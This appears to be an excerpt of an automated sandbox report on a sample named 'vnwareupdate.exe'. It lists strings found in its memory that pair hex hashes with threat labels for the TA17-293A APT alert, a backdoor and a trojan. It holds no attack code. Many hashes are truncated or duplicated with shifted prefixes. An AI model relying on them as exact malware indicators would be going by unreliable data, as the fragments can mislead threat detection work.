Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 07E1740152E09610EA826655D27E8D;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 092DE09E2F346B81A84113734964AD10284F142D;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 09DB36F71106379832C8CA57BA5BE8;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 0A15D1AA85C9D39C4757EFDA861DA014156D31;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 0D2B07DF600285D1D8C49938BC2F79AD3EEF5C77;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 0D7082A5ABE1112615877214EC82241FD17E5BD465E24D794A470F699AF88E;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 12499311682E914B703A8669CE05FA4D;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 12620D0CBCDFBDB04D01A18BBD497B8A;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 141E78D16456A072C9697454FC6D5F58;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 159B71183A69928BA8F26B76772EC504AEFEAC71021B012BD006162E133731;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 1CAA374B5A53E34E161C59D18CE6FDFF;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 1CC9179A724C41E6712CE3F5AEADFD;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 1CE20B4E7A561F0AC5C6C515975B70A5;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 1CE41809508B7F88A24CABA884926C;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 1E78D16456A072C9697454FC6D5F58;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 1FD9AEEACA9631902BCCD6BDD89F74;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 2154A36F32BA10E98020A8AD758A7A;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 243511A51088D57E6DF08D5EF52D5499;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 277256F905D7CB07CDCD096CECC27E76;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 2B07DF600285D1D8C49938BC2F79AD3EEF5C77;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 2C641A9348F1E0CCF9F38EE17F41B2DA;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 2C9095C965A55EFC46E16B86F9B7D6C6;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 2DE09E2F346B81A84113734964AD10284F142D;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 2F159B71183A69928BA8F26B76772EC504AEFEAC71021B012BD006162E133731;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 31008DE622CA9526F5F4A1DD3F16F4EA;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 34A11F3D68FD6CDEF04B6DF17BBE8F4D;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 3511A51088D57E6DF08D5EF52D5499;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 36E477643375030431301ABACCB8287B2EECCE;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 3986FB79BC66807E28F233B52EFA7C315862C8;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 39BFE18D912DBCC940D05D692EFEB9;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 3B6C3DF08E99B40148548E96CD1AC872;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 3C432A21CFD05F976AF8C47A007928F7;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 3C58F168E883AF1294BBCEA33B03E6;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 3CC0D3A05CD0CEF8294506F37A0B8A00;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 3D36E477643375030431301ABACCB8287B2EECCE;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 40D3D8795559A556A8897EC6E003FC91;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 41E48A6B91750D99A8295C97FD55D5;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 432A21CFD05F976AF8C47A007928F7;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 43E71A8C73B5E343AA9D2E19002373;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 451CE41809508B7F88A24CABA884926C;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 4595DBE00A538DF127E0079294C87DA0;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 489F3E5D8BFEB3A75250017191277E2D5D0BAE;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 4909DB36F71106379832C8CA57BA5BE8;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 499311682E914B703A8669CE05FA4D;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: 4AADF3CA86E9B567E23F9F31782495;Gendwnurl Backdoor https://twitter.com/0x766c6164/status/794176576011309056 / https://www.microsoft equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 4CB67845A88F1A9C22CEAAD46F584B;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 4E4E9AAC289F1C55E50227E2DE66463B;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 4E9AAC289F1C55E50227E2DE66463B;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 509F959F92210D8DD40710BA34548AE960864754;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 514DEE65CAF923E829F1E0094D2585;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 529353E33FD3C0D2802BB558414F11;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 5388520F80C6CA3038445EBB3D6A51F3D90BF717;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 5ACC56C93C5BA1318DD2FA9C3509D60B;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 5C2C06DECA8212EB71D2CC7F0D23E9;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 5C5C2C06DECA8212EB71D2CC7F0D23E9;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 5C6A887A91B18289A70BDD29CC86EBDB;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 5D63D4D952E9A0715583F97A2D9EDEB45AE74E;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 5DBEF7BDDAF50624E840CCBCE2816594;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 5FCD7588B1D94008975C4627C8FEB6;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 619528E52A31D1D348ACB2077E2FC240;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 61C909D2F625223DB2FB858BBDF42A76;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 61E2679CD208E0A421ADC4940662C583;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 620D0CBCDFBDB04D01A18BBD497B8A;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: 637F971A3BCD465BF077921A51F7EC;Gendwnurl Backdoor https://twitter.com/0x766c6164/status/794176576011309056 / https://www.microsoft equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 641A9348F1E0CCF9F38EE17F41B2DA;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 64E917FEBEA4AB178F7D21A7E220FE;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 64F0AC82CCC4A6DEF48D5F9079B7C146126C6464;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 65A1A73253F04354886F375B59550B46;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 65FCC51F70B2213BCE4D39DE56646795FD62D169;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 661CC9179A724C41E6712CE3F5AEADFD;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 6A887A91B18289A70BDD29CC86EBDB;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 6C3C58F168E883AF1294BBCEA33B03E6;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 6C3DF08E99B40148548E96CD1AC872;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 722154A36F32BA10E98020A8AD758A7A;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 7256F905D7CB07CDCD096CECC27E76;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 72A28EFB6E32E653B656CA32CCD44B3111145A695F6F6161965DEEBBDC437076;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 738CA02F59A5CD394998A99FCD9613;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 756DD64C1147515BA2298B6A760260;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 765FCD7588B1D94008975C4627C8FEB6;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 78256FBF2F061CFDED7FDD58FEDED6765FADE730374C508ADAD89282F67D77;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 78E90308FF107CE38089DFF16A929431;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 791BCEBAEA85E9129E706B22E3BDA43F762E4A;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 793986FB79BC66807E28F233B52EFA7C315862C8;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: 79B13F81582E64327CFC02425BD7DC;Trojan.Klonzyrat https://twitter.com/jiriatvirlab/status/822601440317345792 / https://www.symante equals www.twitter.com (Twitter)
